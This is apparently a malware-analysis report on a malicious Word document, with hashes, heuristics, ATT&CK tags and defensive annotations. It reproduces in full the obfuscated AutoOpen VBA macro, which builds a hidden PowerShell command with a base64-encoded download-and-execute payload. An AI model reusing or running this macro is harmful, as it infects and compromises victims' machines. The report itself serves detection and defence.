Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2f8b47d5afffe14…

MALICIOUS

Office (OLE)

Size: 267.5 KB · Created: 2018-02-23 14:51:00 · Authoring application: Microsoft Office Word · First seen: 2018-03-04
MD5: 106ed79673c55d8f05559ad7d71860b8 SHA-1: 0fa922436a3a6d35767ca8f0493e200c5114ae09 SHA-256: f2f8b47d5afffe14ab2f180e77f9e43cdbf92739f3b968a95335ad6bc07c1042
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro uses a series of string concatenations and array lookups to construct a command and then executes it. The critical heuristic 'OLE_VBA_SHELL' strongly suggests this command is intended to download and execute a second-stage payload, a common malware-delivery technique.

Heuristics 5

  • VBA macros detected — severity: medium — 2 related findings — OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA — severity: critical — OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        JL_QC = JL_QC + IR_PD
        Shell$ JL_QC
    End Sub
  • AutoOpen macro — severity: low — OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "green"
    Sub AutoOpen()
        Dim JL_QC As String
  • Legacy WordBasic auto-exec macro marker — severity: medium — OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5836 bytes
SHA-256: 304813dccd45287ca60ecd5fcbca7837710ddb36306be65bff2ce9d82d949fdc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "green"
' Analyst annotation (defensive review of the carved macro; the code itself is left exactly as found).
' Purpose: on document open, assemble a command line one character at a time from the
' HP_PG lookup table, append a long literal (IR_PD) and hand the result to Shell$.
' Detection value: the interpreter name never appears as a literal in the VBA source
' (it is reconstructed from array indices), so text signatures on the macro miss it;
' behavioural telemetry (the Word process spawning a child process from an AutoOpen
' macro) is the robust detection point. Mitigation: block macros in documents from the
' internet / enforce macro policy, and alert on child processes of the Office host.
Sub AutoOpen()
    Dim JL_QC As String
    ' Character table. Every JL_QC += HP_PG(n) line below picks one character from it;
    ' resolving the indices in order (11,12,10,18,1,16,6,18,19,19, ...) yields a
    ' PowerShell command line carrying window-hiding, execution-policy and
    ' encoded-command switches, followed by a trailing space — verify by resolving the
    ' indices yourself before relying on this.
    ' Note: no Option Explicit — HP_PG and IR_PD are undeclared implicit Variants.
    HP_PG = Array("i", "r", "d", "-", " ", "t", "h", "b", "u", "a", "w", "p", "o", "x", "n", "c", "s", "y", "e", "l")
    Dim AO_LJ As String
    ' AO_LJ .. DK_SC are fixed-width chunks of one long literal; they are joined into
    ' IR_PD in the same order they are declared. The chunk boundaries and the
    ' interleaved JL_QC lines are noise to defeat line-based matching — they do not
    ' change the result. The trailing "=" on the last chunk (DK_SC) is consistent with
    ' base64 padding, so IR_PD is presumably the argument for the encoded-command
    ' switch; it is deliberately not decoded in this annotation — decode it in an
    ' isolated analysis environment to recover the second-stage details.
    AO_LJ = "ZgB1AG4AYwB0AGkAbwBuACA"
    ' First two characters of the interpreter name.
    JL_QC = JL_QC + HP_PG(11)
    JL_QC = JL_QC + HP_PG(12)
    Dim DS_OE As String
    DS_OE = "AYQAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbA"
    JL_QC = JL_QC + HP_PG(10)
    JL_QC = JL_QC + HP_PG(18)
    Dim AO_OH As String
    AO_OH = "FMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
    JL_QC = JL_QC + HP_PG(1)
    JL_QC = JL_QC + HP_PG(16)
    Dim IQ_TF As String
    IQ_TF = "G4AZwBdADoAOgBVAFQAR"
    JL_QC = JL_QC + HP_PG(6)
    JL_QC = JL_QC + HP_PG(18)
    Dim BT_SA As String
    BT_SA = "gA4AC4ARwBlAHQAUwB0A"
    ' IR_PD is never Dim'd: as an implicit Variant it starts Empty, so this first
    ' "&" simply yields the five chunks joined.
    IR_PD = IR_PD & AO_LJ & DS_OE & AO_OH & IQ_TF & BT_SA
    JL_QC = JL_QC + HP_PG(19)
    JL_QC = JL_QC + HP_PG(19)
    Dim IT_QG As String
    IT_QG = "HIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4A"
    ' Index 4 is a space and index 3 is "-": from here on the lookups spell the
    ' switches that follow the interpreter name.
    JL_QC = JL_QC + HP_PG(4)
    JL_QC = JL_QC + HP_PG(3)
    Dim CN_LG As String
    CN_LG = "dgBlAHIAdABdADoAOgBGAHIAbwBtAEIAY"
    JL_QC = JL_QC + HP_PG(10)
    JL_QC = JL_QC + HP_PG(0)
    Dim GR_KH As String
    GR_KH = "QBzAGUANgA0AFMAdAByAGkAbgBnACgA"
    JL_QC = JL_QC + HP_PG(14)
    JL_QC = JL_QC + HP_PG(2)
    Dim ES_MC As String
    ES_MC = "JAB4ACkAKQB9ADsAaQBlAHgAIAAkACgAYQAgA"
    JL_QC = JL_QC + HP_PG(12)
    JL_QC = JL_QC + HP_PG(10)
    Dim DT_QB As String
    DT_QB = "CQAKAAkACgAJAAoAGkAbgB2AG8Aa"
    IR_PD = IR_PD & IT_QG & CN_LG & GR_KH & ES_MC & DT_QB
    JL_QC = JL_QC + HP_PG(16)
    JL_QC = JL_QC + HP_PG(5)
    Dim AT_MA As String
    AT_MA = "wBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0"
    JL_QC = JL_QC + HP_PG(17)
    JL_QC = JL_QC + HP_PG(19)
    Dim CK_QF As String
    CK_QF = "AHQAcABzADo"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(4)
    Dim JT_OE As String
    JT_OE = "ALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgBhAGw"
    JL_QC = JL_QC + HP_PG(6)
    JL_QC = JL_QC + HP_PG(0)
    Dim DM_NI As String
    DM_NI = "ALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBp"
    JL_QC = JL_QC + HP_PG(2)
    JL_QC = JL_QC + HP_PG(2)
    Dim HL_NE As String
    HL_NE = "AG4AZABvAHcAcw"
    IR_PD = IR_PD & AT_MA & CK_QF & JT_OE & DM_NI & HL_NE
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(14)
    Dim GS_PJ As String
    GS_PJ = "AuAG4AZQB0AC8AdwBhA"
    JL_QC = JL_QC + HP_PG(4)
    JL_QC = JL_QC + HP_PG(3)
    Dim HS_NI As String
    HS_NI = "HIAZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByA"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(13)
    Dim EM_LF As String
    EM_LF = "D0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJ"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(15)
    Dim BL_RA As String
    BL_RA = "QAyADAAZQBxACUAMgAw"
    JL_QC = JL_QC + HP_PG(8)
    JL_QC = JL_QC + HP_PG(5)
    Dim FP_MD As String
    FP_MD = "ACUAMgA3AHMAdABhAGcAZQAlADIANwAmACQAUwBlAGwA"
    IR_PD = IR_PD & GS_PJ & HS_NI & EM_LF & BL_RA & FP_MD
    JL_QC = JL_QC + HP_PG(0)
    JL_QC = JL_QC + HP_PG(12)
    Dim DN_LG As String
    DN_LG = "ZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgA"
    JL_QC = JL_QC + HP_PG(14)
    JL_QC = JL_QC + HP_PG(11)
    Dim BR_TA As String
    BR_TA = "wADEANwAtADAANAAtADEANwAmAHMAcwA9A"
    JL_QC = JL_QC + HP_PG(12)
    JL_QC = JL_QC + HP_PG(19)
    Dim CT_QC As String
    CT_QC = "GIAZgBxAHQA"
    JL_QC = JL_QC + HP_PG(0)
    JL_QC = JL_QC + HP_PG(15)
    Dim BM_LA As String
    BM_LA = "JgBzAHIAdAA9AHMAYwBvAC"
    JL_QC = JL_QC + HP_PG(17)
    JL_QC = JL_QC + HP_PG(4)
    Dim DL_TE As String
    DL_TE = "YAcwBwAD0AcgB3AGQAbABhAGMAdQBwACYAcwBlAD0AMgAwA"
    IR_PD = IR_PD & DN_LG & BR_TA & CT_QC & BM_LA & DL_TE
    JL_QC = JL_QC + HP_PG(7)
    JL_QC = JL_QC + HP_PG(17)
    Dim AT_OA As String
    AT_OA = "DEANwAtADEAMAAtADAANgBUADIAMgA6ADQAMQA"
    JL_QC = JL_QC + HP_PG(11)
    JL_QC = JL_QC + HP_PG(9)
    Dim BK_NI As String
    BK_NI = "6ADEAMgBaACYAcwB0AD0"
    JL_QC = JL_QC + HP_PG(16)
    JL_QC = JL_QC + HP_PG(16)
    Dim EP_KG As String
    EP_KG = "AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQ"
    JL_QC = JL_QC + HP_PG(4)
    JL_QC = JL_QC + HP_PG(3)
    Dim BQ_KI As String
    BQ_KI = "A6ADEAMgBaACYAcwBwAHIAPQBoAHQAdABwAHMAJgBzAGkAZwA9"
    ' Last two lookups: the final switch letter and a separating space, after which
    ' IR_PD is appended as that switch's argument.
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(4)
    Dim FR_QG As String
    FR_QG = "AHQAegBQADcAYwA4AHgAWgBoAH"
    IR_PD = IR_PD & AT_OA & BK_NI & EP_KG & BQ_KI & FR_QG
    ' Remaining chunks: no more character lookups are interleaved from here on.
    Dim DT_SC As String
    DT_SC = "IAMQBzAGIAdgB4"
    Dim AP_SH As String
    AP_SH = "ADkAZgBKAFMAdwBKAEkAUwBIAE"
    Dim EO_RE As String
    EO_RE = "IANgBlADgAJQAyAEIAbg"
    Dim GP_TG As String
    GP_TG = "BsAGwAdQBuAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEACcAIAAt"
    Dim CO_OJ As String
    CO_OJ = "AEgAZQBhAGQAZQByAHMAIABAAHsAJwBBAGMAYwB"
    IR_PD = IR_PD & DT_SC & AP_SH & EO_RE & GP_TG & CO_OJ
    Dim FM_MB As String
    FM_MB = "lAHAAdAA"
    Dim IM_KE As String
    IM_KE = "nAD0AJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4A"
    Dim AQ_TH As String
    AQ_TH = "LwBKAFMATwBOAC"
    Dim CQ_TD As String
    CQ_TD = "cAfQApAC4AQwBvAG4A"
    Dim DN_PG As String
    DN_PG = "dABlAG4AdAAgAHwAIABDAG8AbgB"
    IR_PD = IR_PD & FM_MB & IM_KE & AQ_TH & CQ_TD & DN_PG
    Dim HL_SH As String
    HL_SH = "2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgB2AGEA"
    IR_PD = IR_PD & HL_SH
    Dim DK_SC As String
    ' Final chunk; its trailing "=" is the base64-padding hint mentioned above.
    DK_SC = "bAB1AGUALgBkAGEAdABhACkAKQA="
    IR_PD = IR_PD & DK_SC
    ' Full command line = interpreter + switches (JL_QC) followed by the literal (IR_PD).
    JL_QC = JL_QC + IR_PD
    ' Process launch — this is the line matched by the OLE_VBA_SHELL heuristic and the
    ' point where host telemetry sees a child process of the Office application.
    Shell$ JL_QC
End Sub